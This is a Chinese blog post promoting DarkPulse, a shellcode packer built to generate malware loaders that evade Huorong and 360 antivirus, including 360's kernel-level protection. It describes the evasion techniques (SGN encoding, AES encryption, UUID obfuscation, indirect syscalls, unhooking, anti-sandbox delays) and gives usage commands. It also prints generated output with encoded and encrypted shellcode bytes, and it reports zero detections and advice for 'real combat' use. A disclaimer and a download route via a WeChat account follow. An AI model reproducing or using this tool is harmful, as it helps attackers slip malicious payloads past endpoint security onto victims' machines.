Bypass 360核晶的shellcode Packer

最新推荐文章于 2024-05-24 15:55:12 发布
最新推荐文章于 2024-05-24 15:55:12 发布
阅读量380 收藏 8
点赞数 4
文章标签: 免杀工具 免杀 Bypass 360核晶
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Fly_hps/article/details/139172650
版权

​基本介绍

DarkPulse是一个用go编写的shellcode Packer,可用于生成各种各样的shellcode loader,目前可过火绒,360,360核晶。

主要特点

  • 使用sgn编码,使用了EgeBalci/sgn提供的二进制文件。

  • 支持aes/xor加密,uuid/words混淆,支持间接syscall和unhook两种模式下的callback,fiber,earlybird三种加载方式。

  • 间接sysacll参考了SysWhispers3的项目

  • unhook使用了自定义跳转函数的unhook方法文中所讲述的方法,文中提到的github仓库 trickster0/LdrLoadDll-Unhooking 只实现了64位下的demo,我在 LdrLoadDll-Unhooking-x86-x64 中完善了32位和64位通用的一段代码。

使用方法

为了规避内存扫描会休眠10s左右,所以并不能一下就上线,在实战中推荐使用-sandbox参数,针对不同机器情况大概会休眠40s,开源之后免杀性能肯定会有所下降,但是程序提供了多个参数可以选择,有的参数组合还是可以Bypass的

简易示例1:

darkPulse.exe -i calc_shellcode.bin -h      _            _    _____       _     | |          | |  |  __ \     | |   __| | __ _ _ __| | _| |__) |   _| |___  ___  / _` |/ _` | '__| |/ /  ___/ | | | / __|/ _ \ | (_| | (_| | |  |   <| |   | |_| | \__ \  __/  \__,_|\__,_|_|  |_|\_\_|    \__,_|_|___/\___|                    author fdx_xdf                    version 2.0                    2024.05Usage:      -h <help>: 显示帮助信息  -i <path>: 原始格式 Shellcode 的路径  -enc <encryption>: Shellcode加密方式 (默认: aes)  -lang <language>: 选择加载器的语言 (默认为 'c',可选值: c,rust)  -o <output>: 输出文件 (默认: Program)  -k <keyLength>: 加密的密钥长度 (默认: 16)  -obf <obfuscation>: 混淆Shellcode以降低熵值 (默认: uuid)  -f <framework>: 目标架构32位还是64位  -sandbox <true/false>: 是否开启反沙箱模式 (默认: true)  -unhook <true/false>: 是否开启unhook模式 (默认: false,使用间接syscall加载)   -loading <loadingTechnique>: 请选择加载方式,支持callback, fiber, earlybird (默认: callback)
   -debug  <true/false>: 是否打印shellcode中间加密/混淆过程(默认为 'false',即不打印)

简易示例2:

darkPulse.exe -i calc_shellcode.bin -f 32 -sandbox -unhook
      _            _    _____       _
     | |          | |  |  __ \     | |
   __| | __ _ _ __| | _| |__) |   _| |___  ___
  / _` |/ _` | '__| |/ /  ___/ | | | / __|/ _ \
 | (_| | (_| | |  |   <| |   | |_| | \__ \  __/
  \__,_|\__,_|_|  |_|\_\_|    \__,_|_|___/\___|

                    author fdx_xdf
                    version 1.2
                    2024.05
[+] 开始为您打包exe

[+] 正在使用 sgn 工具进行编码

[+] 进行sgn编码后的shellcode: 0xe8, 0xe7, 0x00, 0x00, 0x00, 0xeb, 0x04, 0xf7, 0xc8, 0xb9, 0xd8, 0x00, 0x00, 0x00, 0x74, 0x28, 0x35, 0x53, 0xcf, 0x00, 0x00, 0x00, 0x16, 0x22, 0x6c, 0x73, 0x4c, 0xd0, 0x90, 0xbb, 0x18, 0x06, 0xc5, 0x9d, 0xc8, 0x9c, 0x24, 0x28, 0x6e, 0xc8, 0x1b, 0xc4, 0x02, 0x02, 0xfe, 0x16, 0x94, 0x94, 0x94, 0x54, 0x22, 0x23, 0xa4, 0x15, 0x15, 0x6d, 0xc6, 0x56, 0x50, 0xdb, 0x71, 0x79, 0xf2, 0x98, 0x8a, 0xfd, 0x4f, 0x57, 0x16, 0x1d, 0x17, 0x31, 0xfe, 0xf9, 0x25, 0xd9, 0x40, 0x38, 0x22, 0xce, 0xec, 0x91, 0x5c, 0x51, 0x4e, 0x45, 0x47, 0x31, 0x5b, 0x0a, 0x7d, 0x0f, 0x1f, 0x00, 0x32, 0x08, 0x7b, 0x37, 0xd6, 0x28, 0xcb, 0x83, 0x60, 0x31, 0x5e, 0x25, 0x7c, 0x5a, 0x5b, 0x76, 0xfd, 0x84, 0x5a, 0x45, 0x7f, 0x20, 0x43, 0x67, 0xea, 0xc3, 0xd5, 0x1a, 0x95, 0xb9, 0x66, 0x91, 0x9a, 0x13, 0xa4, 0x5c, 0x32, 0xa7, 0x4d, 0xac, 0x21, 0xa5, 0x5c, 0xd9, 0xfd, 0x40, 0x14, 0x4a, 0x31, 0x61, 0x45, 0xa2, 0x6d, 0x0b, 0x78, 0x62, 0x15, 0x1e, 0x36, 0x28, 0x85, 0x40, 0xc3, 0xb7, 0x3a, 0xbb, 0x6b, 0xda, 0x5e, 0x72, 0xa0, 0xfb, 0x5e, 0xbf, 0xd6, 0x6a, 0xc3, 0xbc, 0xa2, 0xc1, 0x1e, 0x32, 0xb5, 0x57, 0xa2, 0x8f, 0x02, 0x66, 0x57, 0xd0, 0x11, 0xa3, 0xa3, 0xa3, 0x03, 0x83, 0x8b, 0xa4, 0xaf, 0xbe, 0xc5, 0xb0, 0x11, 0x4a, 0xb0, 0xc1, 0x5b, 0xcd, 0x59, 0xff, 0x10, 0x8d, 0xee, 0xe9, 0x3c, 0xfc, 0x02, 0x7e, 0x74, 0x02, 0xf9, 0xd1, 0x9a, 0x5f, 0xda, 0x99, 0x6a, 0xc6, 0x55, 0x3f, 0xbf, 0x12, 0xcd, 0xd6, 0x35, 0x84, 0xe6, 0x79, 0x97, 0x02, 0x70, 0x15, 0x89, 0xc0, 0xeb, 0x04, 0x01, 0x5d, 0xcd, 0x58, 0x5b, 0xc1, 0x4b, 0x06, 0x17, 0xeb, 0x04, 0x06, 0x79, 0xc5, 0xf8, 0x0f, 0x46, 0xd2, 0x81, 0x6b, 0x0a, 0x28, 0xd7, 0x99, 0x0a, 0xeb, 0x04, 0xc6, 0xe0, 0xfd, 0x61, 0xc1, 0x4b, 0x0e, 0x9d, 0xeb, 0x04, 0xac, 0x15, 0xdb, 0x80, 0x81, 0x73, 0x12, 0x37, 0x5c, 0xf7, 0x42, 0xeb, 0x00, 0xeb, 0x04, 0xd5, 0x7e, 0xed, 0x06, 0x81, 0x73, 0x16, 0xc7, 0x90, 0xbb, 0x18, 0xeb, 0x04, 0x71, 0x5f, 0x24, 0x89, 0x81, 0x6b, 0x1a, 0x04, 0x41, 0x8f, 0xb1, 0xeb, 0x04, 0x15, 0x91, 0x47, 0xfa, 0x81, 0x6b, 0x1e, 0x9c, 0x24, 0x28, 0x8c, 0xeb, 0x04, 0x9b, 0x0f, 0x5b, 0x0a, 0x81, 0x73, 0x22, 0x38, 0x1f, 0xf5, 0xf8, 0xff, 0xe3

[+] Generated AES key: 0x36, 0x37, 0x54, 0x4c, 0x37, 0x4d, 0x78, 0x53, 0x69, 0x52, 0x53, 0x59, 0x32, 0x47, 0x49, 0x67

[+] Generated IV (16-byte): 0x52, 0x42, 0x62, 0x4c, 0x6e, 0x69, 0x4f, 0x5a, 0x44, 0x44, 0x43, 0x4d, 0x6d, 0x6e, 0x58, 0x
63

[+] Using AES-128-CBC encryption

[+] 进行加密后的shellcode:0x11, 0xef, 0xfd, 0x48, 0x48, 0x69, 0x4f, 0x7e, 0xa7, 0x8d, 0x7d, 0x9a, 0x3c, 0xaf, 0x0b, 0x2f, 0xfc, 0xc7, 0x1f, 0xaa, 0xaf, 0x8d, 0x3b, 0x2f, 0x55, 0x55, 0x0e, 0xa1, 0x95, 0x62, 0x85, 0xc3, 0xc1, 0xa5, 0x67, 0x82, 0x65, 0x38, 0x90, 0x39, 0x20, 0x67, 0x86, 0x6a, 0x5c, 0x18, 0x53, 0x1b, 0xa1, 0x87, 0x1e, 0x9e, 0x70, 0xb1, 0x2e, 0x38, 0x67, 0x0d, 0xe7, 0x2f, 0x3e, 0x3f, 0x49, 0x17, 0xaf, 0x2d, 0x98, 0xcd, 0x68, 0x7d, 0x84, 0x49, 0x35, 0x4d, 0xa5, 0xc5, 0xe3, 0x89, 0xa7, 0x5f, 0x86, 0x6a, 0x72, 0xfa, 0x95, 0x27, 0x60, 0xe7, 0x6f, 0x3a, 0x62, 0x7e, 0x07, 0x1f, 0xc8, 0x11, 0x89, 0xc0, 0x34, 0xb4, 0x0f, 0x65, 0xe6, 0xe3, 0x8e, 0xdb, 0x78, 0x4e, 0x29, 0x51, 0xa2, 0xb2, 0xbf, 0xc8, 0xe7, 0x74, 0x5c, 0xb6, 0x98, 0xec, 0x25, 0xe4, 0x85, 0x9a, 0x08, 0xdc, 0xaf, 0xe9, 0x55, 0xa5, 0xf7, 0x5e, 0x23, 0x66, 0xc1, 0x68, 0xb0, 0xd1, 0x58, 0xa2, 0x68, 0x76, 0x4d, 0xcd, 0x95, 0x5e, 0xf0, 0x1e, 0x2f, 0xd9, 0xca, 0x01, 0xe7, 0x0b, 0x9e, 0x0a, 0x4c, 0x35, 0xe1, 0x83, 0x31, 0xfc, 0x82, 0xa7, 0xbb, 0x20, 0x5d, 0xe2, 0xe0, 0xc3, 0xff, 0xbb, 0x2f, 0xfa, 0xed, 0xdd, 0x3c, 0xfd, 0x37, 0x3f, 0x5b, 0x19, 0x58, 0xa3, 0xa9, 0xf2, 0x0f, 0x77, 0x41, 0x5e, 0x72, 0xb8, 0x20, 0x61, 0x8b, 0x24, 0x64, 0x12, 0x64, 0x99, 0x73, 0x1f, 0xe2, 0x64, 0xa4, 0x07, 0x84, 0xfe, 0x26, 0x4d, 0x29, 0x89, 0xde, 0xcd, 0x5a, 0x91, 0x48, 0x22, 0x4e, 0x22, 0x20, 0x8a, 0x05, 0x03, 0xb8, 0xea, 0x30, 0x86, 0x36, 0x62, 0xbf, 0xdd, 0x71, 0x4d, 0xd2, 0x0c, 0x56, 0x35, 0x8c, 0x87, 0x39, 0x26, 0xc6, 0xc1, 0xef, 0xad, 0xf5, 0x62, 0x2c, 0x09, 0xe3, 0xab, 0xf3, 0x18, 0xb7, 0xa8, 0x2a, 0xcc, 0xdb, 0xf0, 0xd4, 0x38, 0x4e, 0x58, 0x14, 0xa6, 0x4b, 0x7e, 0x9e, 0xba, 0x3e, 0x4f, 0xf3, 0xe8, 0x60, 0xb0, 0x46, 0xa9, 0x5d, 0x98, 0xb9, 0x7d, 0x0a, 0x35, 0x9d, 0xbf, 0x29, 0x8a, 0x79, 0x99, 0x96, 0x8e, 0xd7, 0xbc, 0x77, 0x36, 0xa5, 0xe6, 0x39, 0x3f, 0x32, 0x70, 0x5e, 0x75, 0x9b, 0xd7, 0xb9, 0x24, 0xa9, 0x24, 0x78, 0x80, 0x70, 0x9f, 0x80, 0x2a, 0x43, 0x0f, 0x04, 0xea, 0xd0, 0xba, 0x22, 0x2c, 0x4e, 0x20, 0x64, 0x65, 0x8a, 0x15, 0xc7, 0x28, 0x32, 0x4e, 0xa3, 0x8c, 0x16, 0xf7, 0x3d, 0xee, 0x79, 0x8b, 0x75, 0x4b, 0xdc, 0x3a, 0x27, 0xb6, 0xfc, 0x41, 0x9b, 0x40

[+] Generated UUIDs:"48fdef11-6948-7e4f-a78d-7d9a3caf0b2f",
                    "aa1fc7fc-8daf-2f3b-5555-0ea1956285c3",
                    "8267a5c1-3865-3990-2067-866a5c18531b",
                    "9e1e87a1-b170-382e-670d-e72f3e3f4917",
                    "cd982daf-7d68-4984-354d-a5c5e389a75f",
                    "fa726a86-2795-e760-6f3a-627e071fc811",
                    "b434c089-650f-e3e6-8edb-784e2951a2b2",
                    "74e7c8bf-b65c-ec98-25e4-859a08dcafe9",
                    "5ef7a555-6623-68c1-b0d1-58a268764dcd",
                    "1ef05e95-d92f-01ca-e70b-9e0a4c35e183",
                    "a782fc31-20bb-e25d-e0c3-ffbb2ffaeddd",
                    "3f37fd3c-195b-a358-a9f2-0f77415e72b8",
                    "248b6120-1264-9964-731f-e264a40784fe",
                    "89294d26-cdde-915a-4822-4e22208a0503",
                    "8630eab8-6236-ddbf-714d-d20c56358c87",
                    "c1c62639-adef-62f5-2c09-e3abf318b7a8",
                    "f0dbcc2a-38d4-584e-14a6-4b7e9eba3e4f",
                    "b060e8f3-a946-985d-b97d-0a359dbf298a",
                    "8e969979-bcd7-3677-a5e6-393f32705e75",
                    "24b9d79b-24a9-8078-709f-802a430f04ea",
                    "2c22bad0-204e-6564-8a15-c728324ea38c",
                    "ee3df716-8b79-4b75-dc3a-27b6fc419b40",

[+] 正在为您生成模板文件: Program.c

[+] 编译成功: Program.exe

即在当前目录下生成 Program.exe

注意:syscall下的earlybird方式由于某些bug并没有使用间接syscall方式加载,尽量不要使用

实现效果

5.20 新增Rust模板,测试如下:

微步云沙箱无检出

360(未开核晶):无检出

火绒:无检出

360(开启核晶):无检出(使用syscall和unhook两种方式生成的exe均成功绕过核晶)

免责声明

本项目仅用安全研究的学习交流和研究,强烈不建议您用于任何的实际途径(包括黑灰产交易、非法渗透攻击、割韭菜),网络不是法外之地!如果您使用该工具则应该自觉遵守以上要求。

下载地址

点击下方名片进入公众号

回复关键字【240524】获取下载链接

FLy_鹏程万里
关注
  • 4
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
红队系列-shellcode AV bypass Evasion免杀合集
aming小老弟
11-13 942
壳就是软件所增加的保护,并不会破坏里面的程序结构,当我们运行这个加壳的程序时,系统首先会运行程序里的壳,然后由壳将加密的程序逐步还原到内存中,最后运行程序。加壳虽然对于特征码绕过有非常好的效果,加密壳基本上可以把特征码全部掩盖,但是缺点也非常的明显,因为壳自己也有特征,主流的壳如VMP, Themida等等。客户端上传特征,在云端无法检测到,则上传文件,文件通过杀软系统进行评判,得出总评分,对于无结果的,进行鉴定系统评分,总共得出结果返回给用户,并入云端库。比如可以远程读取png中的shellcode
Storm Worm && Botnet Analysis
Kendiv's Box
10-15 7595
Recently, a new Worm/Trojan has been very "popular" in our Net world. This worm uses email and various phishing Web sites to spread and infect computers. When the worm breaks into the system, it ins
【渗透实战】木马免杀
logic1001的博客
05-09 928
base64 sgn编码。
渗透之——Metasploit命令及模块
热门推荐
冰河的专栏
01-26 3万+
show exploits 列出metasploit框架中的所有渗透攻击模块。 show payloads 列出metasploit框架中的所有攻击载荷。 show auxiliary 列出metasploit框架中的所有辅助攻击载荷。 search name 查找metasploit框架中所有的渗透攻击和其他模块。 info 展示出制定渗透攻击或模块的相关信息。 use name 装载一个渗透攻...
渗透神器----Windows10 渗透工具
tlovejr的博客
04-20 1万+
前言 这几天一直有工作,所以就没有来的及去更新靶场还有CTF试题,接下来给大家更新一个优秀的工具:2022年最新Windows10 渗透工具包镜像 系统简介 基于Win10 Workstation 21H2 x64 MSDN原版镜像制作; 完整安装WSL Kali Linux 2022.1,并配置图形化模式; 精简系统自带软件,美化字体及部分图标,适度优化; 镜像容量74.5G,使用单磁盘文件存储,提升性能; 建议运行环境: vmware:16.0 运行内存:8G 固态硬盘:100G 免责声明
metasploit命令及模块
seaship的博客
01-10 1万+
show exploits 列出metasploit框架中的所有渗透攻击模块。 show payloads 列出metasploit框架中的所有攻击载荷。 show auxiliary 列出metasploit框架中的所有辅助攻击载荷。 search name 查找metasploit框架中所有的渗透攻击和其他模块。 info 展示出制定渗透攻击或模块的相关信息。 use name 装载一个渗透攻...
开源攻防武器项目
Websec
07-08 4011
首先恭喜你发现了宝藏。本项目集成了全网优秀的开源攻防武器项目,包含信息收集工具(自动化利用工具、资产发现工具、目录扫描工具、子域名收集工具、指纹识别工具、端口扫描工具、各种插件....etc...),漏洞利用工具(各大CMS利用工具、中间件利用工具等项目........),内网渗透工具(隧道代理、密码提取.....)、应急响应工具、甲方运维工具、等其他安全攻防资料整理,供攻防双方使用。通用漏洞类:基础漏洞类:.........
【Web安全笔记】之【9.0 工具与资源】
AA8j的博客
12-23 3024
9.0 工具与资源 9.1 推荐资源 9.1.1 书单 1. 前端 Web之困 白帽子讲Web安全 白帽子讲浏览器安全(钱文祥) Web前端黑客技术揭秘 XSS跨站脚本攻击剖析与防御 SQL注入攻击与防御 2. 网络 Understanding linux network internals TCP/IP Architecture, Design, and Implementation in Linux Linux Kernel Networking: Implementation and Theor
渗透测试工具大全
2401_84466336的博客
05-24 979
所有工具仅能在取得足够合法授权的企业安全建设中使用,在使用所有工具过程中,您应确保自己所有行为符合当地的法律法规。如您在使用所有工具的过程中存在任何非法行为,您将自行承担所有后果,所有工具所有开发者和所有贡献者不承担任何法律及连带责任。您的使用行为或者您以其他任何明示或者默示方式表示接受本协议的,即视为您已阅读并同意本协议的约束。本教程的目的在于最大限度地唤醒大家对网络安全的重视,并采取相应的安全措施,从而减少由网络安全而带来的经济损失。3不会收取任何广告费用,展示的所有工具链接与本人无任何利害关系。
bypass360_QQ_bypass360_qq登录_QQ界面_界面_
10-03
一个登录界面,仿QQ登录界面。一个登录界面,仿QQ登录界面一个登录界面,仿QQ登录界面一个登录界面,仿QQ登录界面
gld:进入Shellcode LoaDer
05-24
我编写了一个包含更多规避技术的私有框架,将来可能会公开用法首先通过CS / MSF生成shellcode,然后使用gld编译包装的二进制文件: ./gld shellcode.bin [x64/x86]科技类装载机Shellcode通过AES-GCM加密,它将被...
SE一键加壳三十秒秒过360.zip
09-20
SE一键加壳三十秒秒过360 快速(bypass)免杀360 3步快速加壳 (短期内应该有效) 作者自己在虚拟机测试时msf的木马能过360
bypass_bypass_
09-29
適用於近期之xccode之過渡偵測方式之檔案
APS360-captcha-bypass
03-28
APS360验证码旁路
患者发生输液反应的应急预案及护理流程(医院护理资料).docx
06-15
患者发生输液反应的应急预案及护理流程(医院护理资料).docx
chromedriver-win64_121.0.6105.0.zip
最新发布
06-15
chromedriver-win64_121.0.6105.0.zip
chromedriver-win64_120.0.6099.35.zip
06-15
chromedriver-win64_120.0.6099.35.zip
php+sql成绩查询系统(系统+论文+答辩PPT).zip
06-15
php+sql成绩查询系统(系统+论文+答辩PPT).zip
bypass和非bypass区别
05-18
Bypass和非Bypass是指计算机网络中的两种不同路由方式。 Bypass是一种路由方式,也称为直通式路由。当网络设备(如防火墙、负载均衡器等)出现故障或维护时,通过Bypass可以让网络流量直接绕过这些设备,而不会造成网络中断。Bypass通常是在网络设备的前后各设置一个Bypass插槽,当设备发生故障时,Bypass插槽中的开关会自动切换,使流量直接绕过设备。 非Bypass则是另一种路由方式,也称为非直通式路由。当网络设备出现故障或维护时,非Bypass路由方式会导致网络中断,因为网络流量需要经过设备才能到达目的地。 总之,Bypass路由方式可以在设备故障或维护时保持网络的连通性,而非Bypass路由方式则可能会导致网络中断。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值